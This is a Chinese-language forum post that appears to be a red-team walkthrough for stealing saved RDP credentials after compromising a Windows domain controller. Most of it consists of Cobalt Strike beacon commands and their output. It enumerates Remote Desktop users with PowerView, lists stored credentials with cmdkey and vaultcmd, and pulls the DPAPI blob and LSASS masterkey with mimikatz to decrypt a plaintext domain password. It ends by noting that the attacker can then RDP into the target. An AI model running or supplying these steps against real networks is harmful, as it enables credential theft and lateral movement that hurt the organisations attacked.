破解 RDP 憑證

Nalyd 3月前 133

拿下 DC 後,確認哪些 users/groups 有 RDP access 權限

beacon> powerpick Get-NetLocalGroup -ComputerName RDP01 -GroupName "Remote Desktop Users"

ComputerName : RDP01

AccountName  : rasta-lan.local/Jump Box Users

IsDomain     : True

IsGroup      : True

SID          : S-1-5-21-2294392343-2072776990-791666979-1106



查想入侵的主機,有誰是這台主機的 member

beacon> powerpick Get-NetGroupMember -GroupName "Jump Box Users"

GroupDomain  : rasta-lan.local

GroupName    : Jump Box Users

MemberDomain : rasta-lan.local

MemberName   : rasta_mouse_adm

MemberSID    : S-1-5-21-2294392343-2072776990-791666979-1107

IsGroup      : False

MemberDN     : CN=Rasta Mouse (Admin),CN=Users,DC=rasta-lan,DC=local



查目前攻佔的主機,是否有儲存這個 member 的 RDP 憑證

1. command: cmdkey /list


2. 控制台 > 使用者帳戶 > 管理您的憑證 (控制台\所有控制台項目\認證管理員)


3. command:

beacon> shell vaultcmd /listcreds:"Windows Credentials" /all

Credentials in vault: Windows Credentials

Credential schema: Windows Domain Password Credential

Resource: Domain:target=TERMSRV/rdp01

Identity: LAN\rasta_mouse_adm

Hidden: No

Roaming: No

Property (schema element id,value): (100,2)


4. C:\Users\<username>\AppData\Local\Microsoft\Credentials\


5. command:

powerpick Get-ChildItem C:\Users\rasta_mouse\AppData\Local\Microsoft\Credentials\ -Force



破解 RDP 憑證

1. 先拉出 pbData 和 guidMasterKey

mimikatz dpapi::cred /in:C:\Users\rasta_mouse\AppData\Local\Microsoft\Credentials\2647629F5AA74CD934ECD2F88D64ECD0

 guidMasterKey      : {6515c6ef-60cd-4563-a3d5-3d70a6bc6992}

pbData             : 0bad8cb788a364061fa1eff57c3cbc83c8aa198c95537f66f2f973c8fe5e7210626c58423b84b55f604cff2b23165b690ad7fa7ad03d80051cb7c1a0e987f36586ede1bd7ff7e2b9f1d3cbc4b8f1b8557ab1be3402d3bfe39b1682353504ff156615b44ea83aa173c3f7830b65bf9202d823932ca69413fcb8bca1a76893c7cbab7e0ee0bbe9269a8b9f65e88e099334177be15cf977a44b77ba6e829c89303ef4764f5fd661e722c7508ad2e01a41f9cd079fc7ce5a8dba90c94a2314941674ad47567bd9c980548f809fe72ce4895b6a56cb9148c47afb


2. 用 guidMasterKey 拉出的值,對照從 LSASS 拉出的 key

beacon> mimikatz !sekurlsa::dpapi

[00000000]

     * GUID      :  {6515c6ef-60cd-4563-a3d5-3d70a6bc6992}

     * Time      :  02/09/2017 13:37:51

     * MasterKey :  95664450d90eb2ce9a8b1933f823b90510b61374180ed5063043273940f50e728fe7871169c87a0bba5e0c470d91d21016311727bce2eff9c97445d444b6a17b

     * sha1(key) :  89f35906909d78c84ba64af38a2bd0d1d96a0726


3. 破解 RDP 的憑證密碼

beacon> mimikatz dpapi::cred /in:C:\Users\rasta_mouse\AppData\Local\Microsoft\Credentials\2647629F5AA74CD934ECD2F88D64ECD0 /masterkey:95664450d90eb2ce9a8b1933f823b90510b61374180ed5063043273940f50e728fe7871169c87a0bba5e0c470d91d21016311727bce2eff9c97445d444b6a17b

Decrypting Credential:

 * masterkey     : 95664450d90eb2ce9a8b1933f823b90510b61374180ed5063043273940f50e728fe7871169c87a0bba5e0c470d91d21016311727bce2eff9c97445d444b6a17b

**CREDENTIAL**

  credFlags      : 00000030 - 48

  credSize       : 000000d2 - 210

  credUnk0       : 00000000 - 0

  Type           : 00000002 - 2 - domain_password

  Flags          : 00000000 - 0

  LastWritten    : 02/09/2017 12:37:44

  unkFlagsOrSize : 00000030 - 48

  Persist        : 00000002 - 2 - local_machine

  AttributeCount : 00000000 - 0

  unk0           : 00000000 - 0

  unk1           : 00000000 - 0

  TargetName     : Domain:target=TERMSRV/rdp01

  UnkData        : (null)

  Comment        : (null)

  TargetAlias    : (null)

  UserName       : LAN\rasta_mouse_adm

  CredentialBlob : Sup3rAw3s0m3Passw0rd!     <--- BOOM! <Password>

  Attributes     : 0



4. 接下來可以直接 RDP 到目標主機



參考:

https://github.com/PowerShellMafia/PowerSploit/

https://rastamouse.me/2017/08/jumping-network-segregation-with-rdp/

最新回復 (0)
全部樓主
返回